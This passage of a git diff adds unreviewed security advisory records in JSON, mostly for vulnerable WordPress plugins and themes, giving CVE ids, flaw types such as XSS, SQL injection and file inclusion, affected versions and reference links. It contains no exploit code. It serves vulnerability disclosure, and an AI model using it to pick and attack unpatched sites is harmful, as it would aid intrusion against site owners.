b/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4f62-jjjx-4hrr", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22384" + ], + "details": "Deserialization of Untrusted Data vulnerability in leafcolor Applay - Shortcodes applay-shortcodes allows Object Injection.This issue affects Applay - Shortcodes: from n/a through <= 3.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22384" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/applay-shortcodes/vulnerability/wordpress-applay-shortcodes-plugin-3-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json b/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json new file mode 100644 index 0000000000000..670417b0889e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fcf-69p7-63vf", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2025-15583" + ], + "details": "A weakness has been identified in detronetdip E-commerce 1.0.0. This affects the function get_safe_value of the file utility/function.php. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15583" + }, + { + "type": "WEB", + "url": "https://github.com/detronetdip/E-commerce/issues/23" + }, + { + "type": "WEB", + "url": "https://github.com/Nixon-H/PHP-Stored-XSS-Bypass-Real-Escape" + }, + { + "type": "WEB", + "url": "https://github.com/detronetdip/E-commerce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346487" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346487" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754033" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json b/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json new file mode 100644 index 0000000000000..3544edcf3c2cd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4ff7-6hm2-x86r", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68536" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Zota zota allows PHP Local File Inclusion.This issue affects Zota: from n/a through <= 1.3.14.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68536" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/zota/vulnerability/wordpress-zota-theme-1-3-14-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json new file mode 100644 index 0000000000000..c9d372c9ff3e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fwr-9c58-jg7x", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68856" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in keeswolters Mopinion Feedback Form mopinion-feedback-form allows DOM-Based XSS.This issue affects Mopinion Feedback Form: from n/a through <= 1.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68856" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mopinion-feedback-form/vulnerability/wordpress-mopinion-feedback-form-plugin-1-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json b/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json new file mode 100644 index 0000000000000..be351c499944c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4ggr-f4xw-9446", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68514" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Cozmoslabs Paid Member Subscriptions paid-member-subscriptions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Paid Member Subscriptions: from n/a through <= 2.16.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68514" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/paid-member-subscriptions/vulnerability/wordpress-paid-member-subscriptions-plugin-2-16-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json b/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json new file mode 100644 index 0000000000000..4b1d0b5fad4ac --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gvf-3g6g-c2mg", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68048" + ], + "details": "Missing Authorization vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects NextMove Lite: from n/a through <= 2.23.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68048" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-22-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json b/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json index 537cacd209396..6fabb990bd395 100644 --- a/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json +++ b/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4mjj-m5cc-rchc", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:28Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27058" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Podcast penci-podcast allows DOM-Based XSS.This issue affects Penci Podcast: from n/a through <= 1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:27Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json b/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json new file mode 100644 index 0000000000000..439b0b60c7840 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pmf-68jr-9pq2", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-52387" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Stored XSS.This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52387" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/master-addons/vulnerability/wordpress-master-addons-plugin-2-0-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json new file mode 100644 index 0000000000000..485a654633815 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pmr-jmj5-4gwv", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68495" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS.This issue affects JetEngine: from n/a through <= 3.8.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68495" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-8-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json b/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json new file mode 100644 index 0000000000000..bc7a27c9cd671 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qvw-ghv2-2gg4", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68545" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Nika nika allows PHP Local File Inclusion.This issue affects Nika: from n/a through <= 1.2.14.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68545" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/nika/vulnerability/wordpress-nika-theme-1-2-14-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json b/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json new file mode 100644 index 0000000000000..707917cb8fe23 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r8w-crc8-mqph", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69301" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods PhotoMe photome allows Object Injection.This issue affects PhotoMe: from n/a through <= 5.6.11.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69301" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-6-11-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json b/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json new file mode 100644 index 0000000000000..abdce89485ab0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wc7-crf4-r645", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69328" + ], + "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Object Injection.This issue affects Booking and Rental Manager: from n/a through <= 2.5.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69328" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/booking-and-rental-manager-for-woocommerce/vulnerability/wordpress-booking-and-rental-manager-plugin-2-5-9-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json new file mode 100644 index 0000000000000..ceee3bff547c1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5284-5qqc-v2w8", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68037" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atlas Gondal Export Media URLs export-media-urls allows Reflected XSS.This issue affects Export Media URLs: from n/a through <= 2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68037" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/export-media-urls/vulnerability/wordpress-export-media-urls-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json b/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json new file mode 100644 index 0000000000000..37515de12bec0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-536p-mw62-6cm4", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69307" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Medinik Core medinik-core allows Blind SQL Injection.This issue affects Medinik Core: from n/a through <= 1.3.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69307" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/medinik-core/vulnerability/wordpress-medinik-core-plugin-1-3-6-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json b/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json new file mode 100644 index 0000000000000..9449ecb0ba5fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53q4-966f-vpp2", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2832" + ], + "details": "Certain Samsung MultiXpress Multifunction Printers may be vulnerable to information disclosure, potentially exposing address book entries and other device configuration information through specific APIs without proper authorization.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2832" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_14108019-14108039-16/hpsbpi04094" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T18:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json b/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json new file mode 100644 index 0000000000000..53904ef43ca0c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56wx-rr26-54fr", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69011" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPKube Cool Tag Cloud cool-tag-cloud allows Stored XSS.This issue affects Cool Tag Cloud: from n/a through <= 2.29.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69011" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cool-tag-cloud/vulnerability/wordpress-cool-tag-cloud-plugin-2-29-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json b/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json new file mode 100644 index 0000000000000..19dbff5545e63 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57gh-h62q-5fwp", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68834" + ], + "details": "Missing Authorization vulnerability in Saiful Islam Sync Master Sheet – Product Sync with Google Sheet for WooCommerce product-sync-master-sheet allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sync Master Sheet – Product Sync with Google Sheet for WooCommerce: from n/a through <= 1.1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68834" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/product-sync-master-sheet/vulnerability/wordpress-sync-master-sheet-product-sync-with-google-sheet-for-woocommerce-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json new file mode 100644 index 0000000000000..cb83f3759f068 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57vf-72qj-2828", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69330" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Prestige prestige allows Reflected XSS.This issue affects Prestige: from n/a through < 1.4.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69330" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/prestige/vulnerability/wordpress-prestige-theme-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json b/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json new file mode 100644 index 0000000000000..4fa1191a27ef1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58h5-w6gx-q297", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67980" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion.This issue affects Hara: from n/a through <= 1.2.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67980" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/hara/vulnerability/wordpress-hara-theme-1-2-17-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json b/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json new file mode 100644 index 0000000000000..d823959e42d7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58p5-8f5p-8qqg", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68002" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in 100plugins Open User Map open-user-map allows Path Traversal.This issue affects Open User Map: from n/a through <= 1.4.16.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68002" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/open-user-map/vulnerability/wordpress-open-user-map-plugin-1-4-16-arbitrary-file-download-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json b/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json new file mode 100644 index 0000000000000..b426dd1ef3574 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58qh-jxh9-rvp5", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67969" + ], + "details": "Missing Authorization vulnerability in knitpay UPI QR Code Payment Gateway for WooCommerce upi-qr-code-payment-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UPI QR Code Payment Gateway for WooCommerce: from n/a through <= 1.5.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67969" + }, + { + "type": "WEB", + "url": 